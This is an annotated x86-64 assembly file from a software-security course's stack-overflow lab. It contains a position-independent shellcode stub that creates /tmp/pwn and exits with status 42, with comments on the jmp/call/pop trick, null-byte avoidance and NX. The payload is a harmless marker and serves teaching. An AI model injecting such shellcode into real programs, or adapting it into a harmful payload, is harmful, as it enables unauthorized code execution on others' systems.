cours/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S


# Linux x86-64 position-independent stub, GNU as AT&T syntax.
# Course exercise payload: creates the file /tmp/pwn, then exits with status 42.
# Both effects are observable markers that the stub ran (a new file and the
# exit code), which is also what a defender would look for after the exercise.
#
# Layout: _start jumps forward to a call placed directly before the path
# string. The call pushes the address of the string as its return address,
# so the code needs no absolute address and works wherever it is loaded.
#
# Register values are built with push/pop pairs rather than mov immediates.
# NOTE(review): presumably chosen to keep zero bytes out of the encoding;
# confirm against the assembled bytes.
# NOTE(review): when this runs as injected data rather than from .text, it
# only executes if the containing memory is executable; with a non-executable
# stack (NX) the first fetch faults instead. Confirm the build flags of the
# target program used in the exercise.
.text
.globl _start
_start:
jmp indirect                    # go to the call so the string address gets pushed
p:
xorq %rdi, %rdi                 # redundant: the pop below overwrites all of rdi
pop %rdi                        # rdi = return address of call p = address of the path string
# Next instruction is commented out in the original and stays disabled.
#shr $0x8, %rdi
push $0x1b6                     # 0x1b6 = 0666 octal: read/write for user, group, other (umask still applies)
xor %rsi, %rsi                  # redundant: overwritten by the pop below
pop %rsi                        # rsi = mode argument
push $85
pop %rax                        # rax = 85, the creat syscall number on x86-64 Linux
# creat behaves as open with O_CREAT|O_WRONLY|O_TRUNC: an existing /tmp/pwn
# is truncated, and the returned descriptor (or error) in rax is never checked.
syscall                         # creat(path, 0666); clobbers rcx and r11
xorq %rax, %rax                 # redundant: rax is reloaded below
xorq %rdi, %rdi                 # redundant: rdi is reloaded below
push $42
pop %rdi                        # rdi = 42, the exit status
push $61
pop %rax
lea -1(%rax), %rax              # rax = 61 - 1 = 60, the exit syscall number; the file does not say why 60 is not loaded directly
syscall                         # exit(42); does not return
indirect:
call p                          # pushes the address of the next byte, which is the start of the string
.asciz "/tmp/pwn"               # NUL-terminated path read by creat through rdi